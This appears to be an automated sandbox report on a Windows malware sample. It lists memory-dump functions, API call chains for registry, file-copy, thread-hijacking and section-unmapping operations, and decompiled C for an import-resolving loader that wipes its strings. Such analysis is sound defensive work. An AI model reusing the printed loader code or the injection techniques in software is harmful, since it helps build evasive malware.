  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
